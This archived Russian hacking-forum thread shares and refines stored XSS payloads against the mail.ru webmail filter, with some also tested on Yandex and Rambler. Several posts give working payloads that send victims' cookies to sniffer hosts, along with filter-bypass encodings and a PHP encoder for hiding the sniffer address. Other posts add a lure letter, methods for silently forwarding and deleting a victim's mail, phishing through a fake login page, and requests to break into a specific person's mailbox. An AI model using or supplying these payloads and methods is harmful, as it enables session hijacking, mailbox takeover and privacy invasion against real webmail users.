PDA

Просмотр полной версии : Активная XSS на mail.ru


Dronga
04.12.2005, 09:49
Заранее прошу прощения у модераторов за дублирование темы, просто на мой взгляд в этом разделе следует выкладывать _готовые_ уязвимости, а не задавать вопросы по их поиску.

Антология XSS на mail.ru

Не знаю, может кому пригодится, но эволюция фильтра на mail.ru протекала следующим образом. На момент моей регистрации на античате перестала действовать фишка.
<image src=JaVaScRiPt:alert()>
Все были очень удивлены :p Эта бага держалась очень долго...
Следущая ошибка была найдена мной, помог мне Майор, она работала под IE, а я тестил под Оперой) Майор проверил под IE, я ему сперва даже не поверил) Брался fail.txt, в нем в наглую прописывалось:
<script>alert()</script>
и всё это дело переименовывалось в fail.jpg. Но эту филонку сравнительно быстро прекрыли...

Следующим шагом стал пост уже не помню кого... =) Если напомните, то будет хорошо) XSS проходила благодаря двойному кодированию в ASCII слова javascript. При этом этаже бага была одновременно актуальна и для yandex.ru =) Выглядело это так:
<img src="http://server.com/picture.jpg" dynsrc="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:document.images[0].src='http://sniffer.com/sniff.php?cook='+document.cookie">
К сожалению, всё что ушло в большой паблик долго не живет =)

И тут снова Майор, умнейший человек) Я долго ругался когда он мне одному из первых поведал о собственном открытии) Всё было просто и изящно... Чтобы закрыть предыдущую багу, фильтр на Mail.ru стал до бесконечности раскодировать то что закодировано в ASCII... Тогда Майор половину слова javascript закодировал в ASCII и отдельно ещё раз зашифровал каждый символ &. А другую половину поставил через знак табуляции... И фильтр терялся... Выглядело это так:<bgsound src="&#106&#97&#118&#97&#115&#99&#114 ipt:alert()" loop=5> Но и эта уязвимость будучи выложенной долго не продержалась. И вот эта тема коснулась меня) Всю ночь убил на поиски, эксперименты... Мозги уже не варят. XSS выглядит следующим образом:
<font color="green>"style="font-size:1px;background:url\(java/**/script:alert('XSS by Dronga'))">

Вот) Активная, в теле письма... Конечно она ещё сыровата, но общая конструкция видна. В таком виде работает вроде только под ИЕ, сколько не пытался под оперу заточить - бесполезно... Кто будет пробовать - советую поиграть с символами " и `. Что-то типа вот так: color=`green"style

Конечно, может кто-то что-то и покруче нашел, что для всех браузеров применимо, но что я нашел тем и поделился.

PS. Не забываем о приватности раздела и доверии друг другу.

byte57
04.12.2005, 10:26
респект, проверим седня

grinay
04.12.2005, 10:34
Молоток плюсик те:)

TANZWUT
04.12.2005, 11:20
сейчас потестим:):):)

m0nzt3r
04.12.2005, 11:49
ну вот=) в МОА только достойнейшие=)

qBiN
04.12.2005, 11:52
Если напомните, то будет хорошо)По мойму дело рук Майора, или ЛиттлЛамера что-то не припомню...
А плюс щас поставим...

kot777
04.12.2005, 12:16
Странно, у меня не работает, последние скобки заменяются на подмигивающий смайл.
Добавлено:
Точно про разметку забыл, гост спасибо

byte57
04.12.2005, 12:24
каким браузером тестил? хотя скорее всего ты разметку <html></html> не делал, да?

Dronga
04.12.2005, 15:20
Ребята, всё работает, заходим в раздел E-mail->FAQ, скачиваем програмку XSSTester от LittleLamer, удаляем всё что там забито по дефолту и вставляем мой вариант, ничего не дописываем (никаких <html></html> не надо, их фильтр нещадно режет, вставляем одну единственную строчку - саму XSS). Забиваем информацию для отправки и отправляем. Идем проверяем, ещё раз напоминаю что актуально в таком виде только для IE (у меня IE6 SP2).

kot777
04.12.2005, 15:49
Кто-нибудь сформировал запрос, уже со сниффером, просто у меня не получается правильную структуру сделать.

SanyaX
04.12.2005, 15:51
Может что у меня sp1 один стоит поэтому косяки по идее нормально всё должно!

PinkPanther
05.12.2005, 02:28
Dronga респект!!!

Кто-нибудь сформировал запрос, уже со сниффером, просто у меня не получается правильную структуру сделать.Держи:<font color="green>"style="font-size:1px;background:url\(java/**/script:document.images[0].src='http://privatesniff/s.jpg?'+document.cookie)">

SanyaX
05.12.2005, 15:17
А я видео снял про XSS на yandex.ru смотрите в разделе видео.

PSalm69
05.12.2005, 15:19
Dronga респект!!!

Держи:<font color="green>"style="font-size:1px;background:url\(java/**/script:document.images[0].src='http://privatesniff/s.jpg?'+document.cookie)">

Я ващет прячу под кодировкой свой снифф. Чего и всем советую. Меня так один раз вычислили когда указал свой снифф.
Пантер, стуканись плз в аську, дело есть.

byte57
05.12.2005, 15:28
саняХ поди такая же бага? ;)
а вообще не поленись - напиши еще, мне вот видео влом качать...

SanyaX
05.12.2005, 15:34
Нет не такая воще её просек морф просто в гипер ссылки java скрипты воще не фильтруются втавляешь туда простой запрос чтобы куки пиздит и всё. Прошу добавить мне репутации =))

byte57
05.12.2005, 15:55
кстати бага дрона и на рамблере сработала!)

PSalm69
05.12.2005, 15:58
Нет не такая воще её просек морф просто в гипер ссылки java скрипты воще не фильтруются втавляешь туда простой запрос чтобы куки пиздит и всё. Прошу добавить мне репутации =))
А какая? =)
Принцип один и тот же.

SanyaX
05.12.2005, 15:58
Аха точно всё работает прикольно почти на всех почтовых службах можно сесию угнать прикольно!!!

SanyaX
05.12.2005, 15:59
А какая? =)
Принцип один и тот же.
Что то я тебя не понял не много! Ты имеешь ввиду активная или пассивная. Активная там. Вообщем посмотри лучше видео.

PSalm69
05.12.2005, 16:05
кстати бага дрона и на рамблере сработала!)
Скажу более... если ента тема протолкнётся дальше в одном из мыльников, то пипец ваще будет. Правда там с кодировкой надо поиграть. Ваще Дронга молодца! В копилке XSS на мыльниках от тебя (кажись и от МАЙОРа) +1

SanyaX
05.12.2005, 16:10
Хех дронга XSS не работает на yandex'e так что прикольно что нашёл на яндексе. Блин я так старался видео сделать что мне не кто не что не добавят. А воще я так и предполагал что гринам,модерам,админам,Мем ерам. Не будет это интересно потому что они самые умные =))

byte57
05.12.2005, 16:31
ахаха, джордан - гений, поставлю репу, если напишешь в форуме ну хотя б в этом разделе отдельный топик...

простейший hex-encoder:

<?
$str = str_replace("%20", "", $QUERY_STRING);
for ($i=0; $i<strlen($str); $i++)
{
$hex=dechex(ord($str[$i]));
if ($str[$i]=='&') echo "$str[$i]";
else if ($str[$i]!='\\') echo "%$hex";
}
?>

censored!
05.12.2005, 16:40
Вы своими XSS поломали оборудование на mail.ru =)))))))))))))
...
Ошибка
Уважаемый пользователь!
Вы вводите правильный пароль к почтовому ящику.
Открываемый Вами почтовый ящик в данный момент недоступен из-за сбоя в работе оборудования.
Нами ведутся аварийные восстановительные работы.
Пожалуйста, попробуйте повторить попытку входа в почтовый ящик через 3 часа.
Приносим извинения за доставленные неудобства.

dinar_007
05.12.2005, 16:43
ЛОЛ )))
А какими прогами лучше отправлять письмо в ХТМЛ? Ато через веб интерфейс низя на мыл.ру (((

byte57
05.12.2005, 16:45
XSS Tester неплохая прога - заюзай поиск по форуму...
+ а у меня нормально на мыло заходит... ну пока помучаем рамблер)

censored!
05.12.2005, 16:48
Можешь с rambler.ru, можешь в ЗеБате (Параметры-Формат сообщения) или Оутлуке.
XSS Tester -> http://www.forum.antichat.ru/attachment.php?attachmentid=175

byte57
05.12.2005, 17:47
вот на мэйл.ру залезть с кукой - все понятно: или CookieEditor или AccessDiver...

- на рамблере блин в куке всего 1 значение показывает CookieEditor (ruid), когда приходит где-то 5...
- через дайвер пробовал по рефереру зайти + кука - редиректит на rambler.ru

Dronga
21.02.2006, 01:08
Спасибо всем за старания товарищи, бага не актуальна. Сегодня её прикрыли. Месяц она жила, думаю многие неплохо погрелись на этом. Можно конечно выложить ещё одну и я бы сделал это если бы тут умели хранить секреты. Пальцем ни в кого не тыкаю, но не очень приятно когда ко мне в асю стучатся левые люди и показывают мне мою же Xss... Делаем выводы господа. Всем ещё раз спасибо.

max_pain89
21.02.2006, 16:00
Дронга, не отчаивайся друг. Все летает как по маслу! Админы mail.ru не такие умные люди. Щас катит всебраузеровый вариант:

<img/src='http://////>>>>>\&#+39 style='display:none;&#+39 onerror=confirm()>

тестил только что, спасибо в репе, если я помог

Dronga
21.02.2006, 17:24
Да помог то помог, только не мне, опять всё повторится... И помоему это не для всех браузеров, сейчас погляжу. Дело в img/src - эту конструкцию не все браузеры принимают, IE на ура, а вот остальные не примут вроде.

Elekt
15.07.2006, 19:46
Решено спустить в общее.

Думаю, Всем будет интересно почитать историю лома mail.ru.

Кстати, данные ХSS работают на других менее "продвинутых" почтовиках :)
Удачных подвигов!

Помните, данная информация предназначена только для ознакомления. Мы не рекомендуем Вам испытывать данные XSS-эксплоиты.

Powered by Antichat.ru

Dronga
16.07.2006, 02:21
Наконец-то в паблике =) Сколько шуму было из этой темы. Как раз на момент её создания alsa основал АМА (пожалуй, самый закрытый на сегодня раздел) и я был первым кто в него зашел и первым моим постом в абсолютно пустом разделе стала усовершенствованная XSS. Так хотелось приписать "Первый нах!", ну вы понимаете, момент ведь исторический.

На открытие опять-таки навел Майор, он уже всё обыграв в голове и поняв просто спросил, почему работает это:
<font color="green>"style="font-size:1px;background:url\(java/**/script:alert('XSS by Dronga'))">
.... И меня осенило =) Вот так всё и получается.

<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')> Вот она работала под всеми браузерами, включая FF. Это была бомба к которой имели доступ всего 9 человек с форума =)

Фильтр терялся когда в атрибуте натыкался на закрывающий тег знак > и после него уже не смотрел.. А с точки зрения браузера всё что в кавычках - это атрибут. Поэтому генерилась ошибка и добавив обработчик onerror мы добивались своего =) Из МОА никто не догадался, хотя всё было у них перед глазами)

Пусть теперь все видят и знают что и как обсуждается в закрытых разделах. Ну и конечно стремятся туда. Кстати, из всего этого материала рукой подать до ещё одной активной XSS, но только под IE (Greetz to ZaCo =)

Удачи, господа)

Зверь
16.07.2006, 13:33
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')> ,подскажите пожалуйста,что надо вставлТь вместо xss ?

Dronga
16.07.2006, 13:42
Вообще вот такая запись:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')> Это просто наглядно, а вариаций тут может быть куча, можете попробовать даже вот так:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert(1)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('2')>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('3')>Просто дело вашей фантазии.

Отвечаю на вопрос:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=document.images[0].src="http://www.link.com/script_sniffer.php?cooki="+document.cookie;>Что-то около того)

Зверь
16.07.2006, 13:44
Огромное СПАСИБО!!!!

LeopardSS
27.07.2006, 23:24
Честно говоря надоело через хсс, кто б че нового придумал гг

dikiismok
29.07.2006, 06:40
Не могу понять почему не срабатывает...


<img src=\"xss\" width=0 height=0 style=\"top:expression(eval(this.sas));\" width=0 height=0 sas=\"this.src=\'xss\' document.cookie;this.sas=null\" alt=\'\'>

Вот этот код после майловского фильтра...
<img src=\"xss\" width=0 height=0 xstyle=\"top:expression(eval(this.sas));\" width=0 height=0 sas=\"this.src=\"xss\" document.cookie;this.sas=null\" alt=\"\">

Dronga
01.08.2006, 20:17
А ты не заметил, что style отфильтровался и стал xstyle?? Поэтому и не работает.

AMbar
02.08.2006, 00:57
Не пойму, но как это все провети? не пойму отправляю письмо в вижео хтмл с кодом? обоснуйте по полочкам, плз

Dronga
02.08.2006, 04:47
Берёшь абсолютно любое видео на античате, из раздела XSS и на примере mail.ru.

Всё о чём шла речь выше - это способы запустить свой скрипт в браузере жертвы. На практике делается так, отправляется письмо в котором маскируется XSS.. Пользователь получает письмо от некой дамы, например "Katrin", с непонятной темой "MRA"... Девушек то все любят, да и намеки в каждой фразе видят, времена такие.. Открывает и читает:
Privet.. Ya tebe nikogda ne pisala,no sey4as ya buhaya i sama ne znau 4em zanatsa..Daje v translite piwu ot nefig delat.Vot ogladivaus na svou jizn. Molodaya, simpatichnaya, a 4ego-to vse ravno ne hvataet.. Vernee kogo-to. Net, ne podumay, eto ne priznanie v lubvi.. Mi s toboy daje ne znakomi.. I vovse ne sposob poznakomitsa s toboy.. Hota kto ego znaet 4to budet dalwe. Piwu na slu4ainiy yawik, daje ne uverena 4to ti muj4ina.. Samoe glavnoe 4to ya ho4u tebe skazat - po4awe osmatrivaisa, skolko vokrug takih kak ya, molodih, simpatichnih i odinokih? Mojet esli ya hotabi odnogo 4elove4ka zastavlu zadumatsa, to moya jizn stanet lu4we, zna4it ewe ne vse poterano dla lubvi v etom mire.. Ladno, ne zabivay sebe golovu moimi mislami, prosto oglanis i zadumaisa nad etim mirom..А пока он читает, работает код из этого же письма... Всё зависит от фантазии злоумышленника.

Что это может быть??? Да что угодно. Самое банальное, это отправить куки на сниффер и ручками их подменить, а потом спокойно, не вводя никаких паролей попасть в чужой ящик. Никаких знаний практически не нужно, а XSS можно узнать у более сведующих товарищей.

Более продвинутым считается написание скриптов, которые всё сделают за тебя.. Говоря конкретно о mail.ru по собственному опыту: копия всех писем имеющихся в ящике + настройка пересылки всех входящих на твой ящик + удаление письма с сервера. Юзер прочтёт, а при попытке обновить/удалить/переслать увидит надпись "Сообщение удалено с сервера"... Теперь иди свищи и рассказывай, что было, вот только куда-то делось.. Это очень трудоёмкая работа, требующая определенных навыков в програмировании и понимание основ взаимодействия с веб-сервером (запросы, методы аутентификации).

Самые творческие и авантюрные личности идут ещё дальше =) Они используя XSS, перемещают пользователя на поддельную страничку.. Мол произошла ошибка, сессия потеряна.. Страничка в мейловском дизайне, ничего подозрительного, реклама как обычно... После ввода пароля реально перекидывает обратно в ящик... Вот только введённые вами данные уже ушли к хакеру на мыло.

А можно всё совместить =) Вопрос ваших знаний.

Kanick
02.08.2006, 05:10
Dronga, на Mail.ru разве нет защиты от CSRF?

Dronga
02.08.2006, 06:00
Dronga, на Mail.ru разве нет защиты от CSRF?

Если ничего не изменилось, то защита имеется, но очень убогая. Всё сводится к проверке кук и реферера. Куки есть, а подделать рефку средствами php не проблема. Единственное что, опционально имеется возможность запрета заходов с разных IP в рамках одной сессии.

AMbar
03.08.2006, 23:37
Drongo, нет-нет, теорию я то знаю, да и видео у меня есть про это, так вот как вообще заюзать сам вредоносный код, имею хсс в майле, можно подробнее

steppenwolfe
29.08.2006, 03:37
Хочу спросить по поводу XSS в Mail.Ru.

Если я правильно понял, то вот такой вариант уже не катит:

<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('1')>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert(2)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('3')>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('4')>

Я честно попробовал перебить это в десятичную кодировку, получилось что-то типа этого:

<img src="http
://img.mail.ru
/mail/ru/image
s/dumb.gif>"on
error=alert('TEXT'
)>

Поперебирал разные комбинации, но - облом. Был бы у меня декодер - я бы и в шестнадцатиричной попробовал.

Вот я и хочу узнать, это у меня глюки (я, правда, сначала тестил под SP-2, и только потом под незапатченным IE6) или эту дыру заделали?

Может, хотя бы намекнёшь, в какую сторону чесать репу? Я, блин, даже ответ на секретный вопрос знаю, но юзать его нельзя - чел мониторит ящик каждый день, ну и я тоже хотел бы рядом пристроиться:)))

Dronga
16.09.2006, 11:45
Ну чтож... Продолжая демонстрировать интересные и не очень (кому как) способы обхода фильтра, выкладываю следующую XSS. Конечно же, в таком виде она уже не применима для @mail.ru, но...

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:
img=new Image();
img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

В основе данной XSS лежит то, что многие браузеры, в частности IE и Opera, парсят XML. Фильтр пропускал эту конструкцию потому что не видел в ней слова javascript =) А вот браузер видел.. Взяв справочник по XML ты легко разберешься что и почему =)

Mаil2k
18.09.2006, 01:59
Очень познавательно! Респект! Надо будет попробывать

Nowi4ok
07.10.2006, 09:21
вот запалнаю все как надо и код вставлаю а мне пишет Error in connect (SOCKET)

4о делат ктонит потскажет

_Pantera_
07.10.2006, 09:50
кажется бага уже прикрыта

byblik
05.11.2006, 10:08
молодцы ребята mail.ru быстро работают

HOT
15.12.2006, 19:25
А что если чувак пользуется оперой или мозилой.Как вы сбираетесь пиститЬ куки если он сохраняет их жезлом?
В основном продвинутые админы мозилой пользуются а не ИЕ.

maxxtor
19.12.2006, 17:54
10x [=

Google00
28.12.2006, 17:33
Значит так. Мне надо xss - любая(конешно кто щедрый и активную можно :) ). Бабла у меня нету и единственное что могу предложить это 3 шестизначки. Вот такие голимые у меня дела... вот.
пишыте на ето: Kolian_hq@mail.ru

re-arranged
29.12.2006, 03:24
ребят, так есть сейчас xss рабочая или ее уже давно прикрыли?

roruda_semu
29.12.2006, 20:07
eti xss ni rabotayet

GreenBear
29.12.2006, 20:09
04.12.2005, 09:49
уже больше года прошло =d

roruda_semu
29.12.2006, 20:27
Green ya znayu etu realno ya hatil pisat sto noviy xss net katorit rabotayet :)

Ksander
29.12.2006, 20:41
Есть, её за 5$ продают.+ недавно Грейт выкладывал.

roruda_semu
29.12.2006, 20:53
:) tolka 5$ :) ,,, ni doroga ,, a besplatno net ?

Google00
29.12.2006, 23:59
:) tolka 5$ :) ,,, ni doroga ,, a besplatno net ?
Бесплатно НЕТ!!! :rolleyes:

Sn@k3
30.12.2006, 01:16
ГГ на форуме скорее и сидят парниши с майл ру))) учаться на ошибках) сам подумай, бага тока найдена... час, два, нету её)

aka PSIH
31.12.2006, 08:13
http://hosting.mail.ru/Login.jsp?login=%22%3E%3Cscript%3Ealert(%22xss%22) %3C/script%3E

~Real F@ck!~
31.12.2006, 08:33
aka PSIH так ведь тема- Активная XSS- а ты дал Пассивную XSS

aka PSIH
31.12.2006, 08:43
xss давно не выкладывали, пусть пасивная будет... ;)

OMOH_PA
04.01.2007, 01:55
Для бравых ребят из майл.ру надо ставить хайд !

Petr
09.01.2007, 23:16
Вобще не вижу смысла пасивные выкладывать =)

Micr0b
11.01.2007, 00:58
не в обиду но ета хсс с http://forum.xakep.ru/m_802889/tm.htm

InferNo23
11.01.2007, 14:10
Активвная XSS на mail.ru:

http://forum.antichat.ru/thread31014.html

_kREveDKo_
01.04.2008, 02:46
ну сыпьте в парня плюсы, очень даже заслужил)

Qwazar
05.04.2008, 01:56
Хмм.. А если нашёл пассивку на мейле, её стоит сюда вешать или нет?

З.Ы.
И если я не ошибаюсь, там есть слепой скуль.